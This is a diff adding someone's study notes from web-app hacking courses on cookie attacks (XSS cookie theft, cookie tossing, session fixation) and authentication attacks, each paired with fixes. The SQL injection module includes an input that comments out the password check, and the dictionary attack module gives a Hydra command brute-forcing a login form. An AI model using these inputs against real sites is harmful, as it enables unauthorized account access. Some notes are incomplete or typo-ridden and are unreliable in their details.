src/Security/Training/Phase1/666_Web App Hacking: Cookie Attacks/module-1 - Leakage of Cookie with Sensitive Data.txt

@@ -0,0 +1,25 @@
+Overview:
+    -- HTTP vs. HTTPS
+    -- Secure Attribute
+    -- Demo
+
+
+
+::  HTTP vs. HTTPS  ::
+--  Tool(s)  --
+
+HTTP:  Insecure
+HTTPS: Secure
+
+
+
+
+::  Secure Attribute  ::
+--  Tool(s)  --
+
+Enforcers cookie transfer only over HTTPS through secure attribute.
+
+
+::  Demo  ::
+--  Tool(s)  --
+Skipped

src/Security/Training/Phase1/666_Web App Hacking: Cookie Attacks/module-2 - Cookie Hijacking.txt

@@ -0,0 +1,49 @@
+Overview:
+    -- Introduction to XSS Attack
+    -- HttpOnly Attribute
+    -- Demo
+
+
+
+::  Introduction to XSS Attack  ::
+--  Tool(s)  --
+
+Reflected Attack
+    User could be prompted by malicious link.
+    Link runs script which pulls all cookies
+    and sends to offload site.
+
+
+
+
+::  HttpOnly Attribute  ::
+--  Tool(s)  --
+
+Prevents JS from having access to the cookie.
+The cookie can still be sent via headers.
+Still need secure argument for transferring
+across only HTTPS
+
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+Shows XSS works
+Can send link to victim with malicious search which reflects
+a script back to the page. The script tag has a script written that requests
+the cookies.
+
+NOTE: This was done through URL parameters
+      Session ID was NOT set to httponly!!
+
+
+Fixes:
+    1. Use httponly attribute on sensitive data!
+        (This doesn't fix the XSS though! It just prevents certain losses.)
+    2. Proper sanitized return data!
+        The script got embedded to the page b/c the page
+        presents a message of what was queried.
+        Do generic responses than taking users input.
+        Simpler than worrying about proper sanitation...

src/Security/Training/Phase1/666_Web App Hacking: Cookie Attacks/module-3 - Weaknesses in Cookie Lifecycle.txt

@@ -0,0 +1,44 @@
+Overview:
+    -- Importance of Regeneration
+    -- Demo
+    -- Server-side Invalidation
+    -- Demo
+
+
+
+::  Importance of Regeneration  ::
+--  Tool(s)  --
+
+
+1. User is logged out: SID=abc
+2. Attacker learns user's SID
+3. User logs in: SID=abc
+4. Attacker can impersonate user
+
+Fix Make sure to regenerate SID periodically.
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+Nothing new shown...
+
+
+
+
+::  Server-side Invalidation  ::
+--  Tool(s)  --
+
+Options:
+    Log users out and clear cookiesl; clear IDs server side too!
+    Change IDs periodically and invalidate the others.
+
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+Nothing new shown...
+Basically shows that the server also needs to invalidate IDs

src/Security/Training/Phase1/666_Web App Hacking: Cookie Attacks/module-4 - Underestimated Risk: XSS via Cookie.txt

@@ -0,0 +1,32 @@
+Overview:
+    -- XSS via Cookie
+    -- Cross-origin Exploitation
+    -- Demo
+    -- Fixing the Problem
+
+
+
+
+::  XSS via Cookie  ::  &&  ::  Cross-origin Exploitation  ::
+--  Tool(s)  --
+
+Script is ran via a cookie.
+An attacker can set the cookie remotely.
+When the domain is visited by the user, XSS via cookie is automatically executed.
+
+Ex:
+    1. Attacker found no exploits in the domain  a.example.com (XSS via cookie).
+    2. b.example.com (XSS)  <-- Attacker can set cookie from here.
+    3. Attacker sets the cookie with  domain=.example.com from b server
+    4. Cookie is appended to outgoing request to server a
+    5. Contents are reflected back to browser from server a b/c of aoppended cookie.
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+    OWASP Sanitizer
+
+Sanitize return data.
+Insert messages from user into a <noscript> tag too.

src/Security/Training/Phase1/666_Web App Hacking: Cookie Attacks/module-5 - Remote Cookie Tampering.txt

@@ -0,0 +1,34 @@
+Overview:
+    -- Browser Dependent Exploitation
+    -- Comma-separated List of Cookies
+    -- Demo
+    -- Fixing the Problem
+
+
+
+
+::  Browser Dependent Exploitation  ::
+--  Tool(s)  --
+
+...
+
+
+
+
+::  Comma-separated List of Cookies  ::
+--  Tool(s)  --
+
+Safari "Issue"
+See  module-5-image-1.png  image
+
+Basically, it overwrites a cookie in the browser to the
+desired thing when there is a cookie.
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Ensure it's set via server than client? >.> Uhhh, might need to re-watch
+See  module-5-image-2.png  image

src/Security/Training/Phase1/777_Web App Hacking: Hacking Authentication/Course Overview.txt

@@ -0,0 +1,10 @@
+Concepts:
+    ...
+
+Overview:
+    -- SQL Injection
+    -- Dictionary Attack
+    -- HTTPS Enforcement
+    -- Session Regeneration
+    -- User Enumeration
+    -- Industry Best Practices

src/Security/Training/Phase1/777_Web App Hacking: Hacking Authentication/module-1 - SQL Injection.txt

@@ -0,0 +1,32 @@
+Overview:
+    -- Understanding SQL Injection
+    -- Demo
+    -- Fixing the Problem
+
+
+
+::  Understanding SQL Injection  ::
+--  Tool(s)  --
+
+Inserting text that get processed by a processor
+when not properly filtered out.
+
+Ex:
+    SELECT * FROM uers WHERE email = 'ex@email.com'' and password = 'xyz'
+        'ex@email.com''      <-- gets processed and generates invalid sql.
+    SELECT * FROM uers WHERE email = 'ex@email.com' -- ' and password = 'xyz'
+        'ex@email.com' -- '  <-- Whatever is written after --<space>
+                                 comments out password verification
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Parameterize the query

src/Security/Training/Phase1/777_Web App Hacking: Hacking Authentication/module-2 - Dictionary Attack.txt

@@ -0,0 +1,43 @@
+Overview:
+    -- Understanding Dictionary Attack
+    -- Hydra
+    -- Demo
+    -- Fixing the Problem
+
+
+
+::  Understanding Dictionary Attack  ::
+--  Tool(s)  --
+
+List of commonly used passwords are used against a user account.
+*** This pretty much requires user enumeration to work...
+
+
+
+::  Hydra  ::
+--  Tool(s)  --
+    Hydra from Kali Linux
+
+Automated password guessing attack
+
+Ex Usage:
+    hydra example.com -L emails.txt -P passwords.txt http-post-form
+    "/login.php :email=*USER“&password=PASS‘ : Invalid password" -S
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+Just used the above command n waited...
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Use CAPTCHAs
+Create lockouts that slow the attacker.
+Force strong passwords from the user.
+Make generic message for failure to login.